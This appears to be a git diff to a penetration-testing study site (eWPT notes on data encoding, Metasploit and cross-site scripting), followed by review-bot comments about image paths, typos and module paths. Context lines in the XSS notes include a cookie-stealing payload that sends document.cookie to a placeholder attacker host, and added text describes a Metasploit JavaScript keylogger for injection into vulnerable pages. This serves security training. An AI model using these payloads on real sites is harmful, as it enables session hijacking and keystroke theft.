diff --git a/docs/cloning-a-site.md b/docs/cloning-a-site.md index e0d841b849..b0b328e5db 100644 --- a/docs/cloning-a-site.md +++ b/docs/cloning-a-site.md @@ -8,7 +8,6 @@ tags: - phishing - tools --- - # Tools for cloning a site [BeEF](beef.md). diff --git a/docs/data-encoding.md b/docs/data-encoding.md index 83600d1dea..e88ffc5440 100644 --- a/docs/data-encoding.md +++ b/docs/data-encoding.md @@ -288,14 +288,14 @@ parseInt("ohpe",36) It's one of the possible attacks that can be perform with unicode: -![Visual spoofing attack](visual-spoofing-attack.png) +![Visual spoofing attack](img/visual-spoofing-attack.png) -![Visual spoofing attack](visual-spoofing-attack_02.png) +![Visual spoofing attack](img/visual-spoofing-attack_02.png) A tool for generating visual spoofing attacks: [https://www.irongeek.com/homoglyph-attack-generator.php](https://www.irongeek.com/homoglyph-attack-generator.php) -![Visual spoofing attack](visual-spoofing-attack_03.png) +![Visual spoofing attack](img/visual-spoofing-attack_03.png) [Paper](https://www.irongeek.com/i.php?page=security/out-of-character-use-of-punycode-and-homoglyph-attacks-to-obfuscate-urls-for-phishing) diff --git a/docs/ewpt-preparation.md b/docs/ewpt-preparation.md index a9049bab63..078449d3f8 100644 --- a/docs/ewpt-preparation.md +++ b/docs/ewpt-preparation.md @@ -28,7 +28,7 @@ eWPTX | Module | Course name | My notes on HackingLife | | ------ | --------------------------------------- | ----------------------------------------------------------------------------------- | -| 01 | Encoding and filtering | | +| 01 | Encoding and filtering | - [Data encoding](data-encoding.md)
- [Input filtering](input-filtering.md) | | 02 | Evasion Basics | | | 03 | Cross-Site Scripting | - [Cross Site Script vulnerabilities](webexploitation/cross-site-scripting-xss.md). | | 04 | Filter evasion and WAF Bypasssing | | diff --git a/docs/metasploit.md b/docs/metasploit.md index 15d71e8d46..a588aec301 100644 --- a/docs/metasploit.md +++ b/docs/metasploit.md @@ -409,6 +409,9 @@ searchsploit nagios3 Use this to enumerate users and brute force passwords in a smb service. +### auxiliary/http_javascript_keylogger + +It creates the Javascript payload with a keylogger, which could be injected within the XSS vulnerable web page and automatically starts the listening server. To see how it works, set the DEMO option to true. ### post/windows/gather/hasdumpĀ  diff --git a/docs/webexploitation/cross-site-scripting-xss.md b/docs/webexploitation/cross-site-scripting-xss.md index 50c33f5595..497ccd181a 100644 --- a/docs/webexploitation/cross-site-scripting-xss.md +++ b/docs/webexploitation/cross-site-scripting-xss.md @@ -360,6 +360,8 @@ HTTPOnly forbids javaScript from accessing the cookies, for example, through the #### 2.1. Cross Site Tracing +[OWASP Cross Site Tracing reference](https://owasp.org/www-community/attacks/Cross_Site_Tracing) + Technique for bypassing HTTPOnly flag. Since scripting languages are blocked due to the use of HTTPOnly, this technique proposes to use the HTTP TRACE method. HTTP TRACE method is a method used for debugging, and it echoes back input requests to the user. So, if we send HTTP headers normally inaccessible to Javascript, we will be able to read them. @@ -414,7 +416,7 @@ var i = new Image(); i.src = "http://attacker.site/log.php?q="+document.cookie; ``` - + Add that code to the injection endpoint that you detected in step 1. That code will save the cookie in a text file on the attacker site. Create a text file (log.php) for capturing the sent cookie in the attacker site: 
@@ -490,7 +492,7 @@ Example of C.php Listerner recording hosts, time of logging, IP addresses: where to store the key strokes @@ -583,6 +587,9 @@ window.setInterval(function()) { ``` + +Additionally, we have the [metasploit](../metasploit.md) module auxiliary(http_javascript_keylogger), an advance version of the previous javascript code. It creates the Javascript payload with a keylogger, which could be injected within the vulnerable web page and automatically starts the listening server. To see how it works, set the DEMO option to true. + ### 5. Network attacks A way to enter within intranet networks is by passing through HTTP traffic that, despite other protocols, is usually allowed to pass by firewalls. diff --git a/mkdocs.yml b/mkdocs.yml index 1a7f21e7cb..965deb20e8 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -135,6 +135,7 @@ nav: - pyinstaller: pyinstaller.md - pypykatz: pypykatz.md - rdesktop: rdesktop.md + - regex: regex.md - regshot: regshot.md - responder.py: responder.md - rpcclient: rpcclient.md
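Review bot: the docs/cloning-a-site.md hunk only drops the blank line between the closing front-matter `---` and `# Tools for cloning a site`; that is a cosmetic drive-by unrelated to the rest of this change (image paths, new module notes, nav entry) and is harmless for the YAML front matter, but it would be cleaner either to leave the file alone or to mention the whitespace tidy-up in the commit message so the diff matches its description.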
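Review bot: the three image references in docs/data-encoding.md now point at `img/visual-spoofing-attack.png`, `img/visual-spoofing-attack_02.png` and `img/visual-spoofing-attack_03.png`, but nothing in this patch moves or adds files under docs/img/, so either the images were relocated in a separate commit or these links will render as broken images. Please confirm the three files exist at the new paths (and are no longer needed at the old ones) and check the output of `mkdocs build` for unrecognized-link warnings before merging.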
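Review bot: in the docs/ewpt-preparation.md hunk the new "My notes" cell for module 01 links to `input-filtering.md`, which is neither added in this patch nor listed in the mkdocs.yml nav hunk below; verify docs/input-filtering.md already exists, otherwise the row will produce a dangling link. While editing this row, the unchanged context line `| 04 | Filter evasion and WAF Bypasssing | |` carries a typo ("Bypassing") that is worth fixing in the same commit.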
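Review bot: the new heading `### auxiliary/http_javascript_keylogger` in docs/metasploit.md is not the path under which msfconsole loads the module; the JavaScript keylogger ships as `auxiliary/server/capture/http_javascript_keylogger`, so a reader who copies `use auxiliary/http_javascript_keylogger` from this heading will get a "Failed to load module" error. Use the full path in the heading. Two smaller points in the same hunk: the added paragraph runs directly into the following `### post/windows/gather/hasdumpĀ` heading with no blank line between them, which Markdown tolerates but the rest of the file separates with blank lines; and that context heading still reads "hasdump" (hashdump) followed by a stray mis-encoded character, which would be worth cleaning up while here.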
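Review bot: the hunk at `@@ -414,7 +416,7 @@` in docs/webexploitation/cross-site-scripting-xss.md is a whitespace-only change (the removed and added lines just above "Add that code to the injection endpoint" differ only in invisible characters). If the intent is to strip trailing or non-breaking whitespace, say so in the commit message; otherwise drop it so the diff stays limited to the documented changes.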
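Review bot: the context line of the `@@ -490,7 +492,7 @@` hunk ("Example of C.php Listerner recording hosts ...") has a typo, "Listener"; since this hunk already touches that region, fix it in the same commit.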
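Review bot: in the `@@ -583,6 +587,9 @@` hunk of cross-site-scripting-xss.md, "an advance version of the previous javascript code" should read "an advanced version", and `auxiliary(http_javascript_keylogger)` should be written as the module path as loaded in msfconsole (`auxiliary/server/capture/http_javascript_keylogger`) rather than in parentheses, so it matches what the reader will type. The paragraph also repeats, word for word, the description just added to docs/metasploit.md; keeping the description in one place and linking to that section from here (`[metasploit](../metasploit.md)` could point at the module's heading anchor) avoids the two copies drifting apart. Finally, the hunk inserts an extra blank line before the paragraph, producing two consecutive blank lines after the closing code fence; one is enough.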
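Review bot: the mkdocs.yml hunk adds `- regex: regex.md` to the nav, but docs/regex.md is not part of this patch. If the file is not already in the repository, `mkdocs build` will warn that a nav entry references a file that does not exist and `mkdocs build --strict` will fail; either include docs/regex.md in this change or confirm it is already committed. The alphabetical placement between rdesktop and regshot is correct.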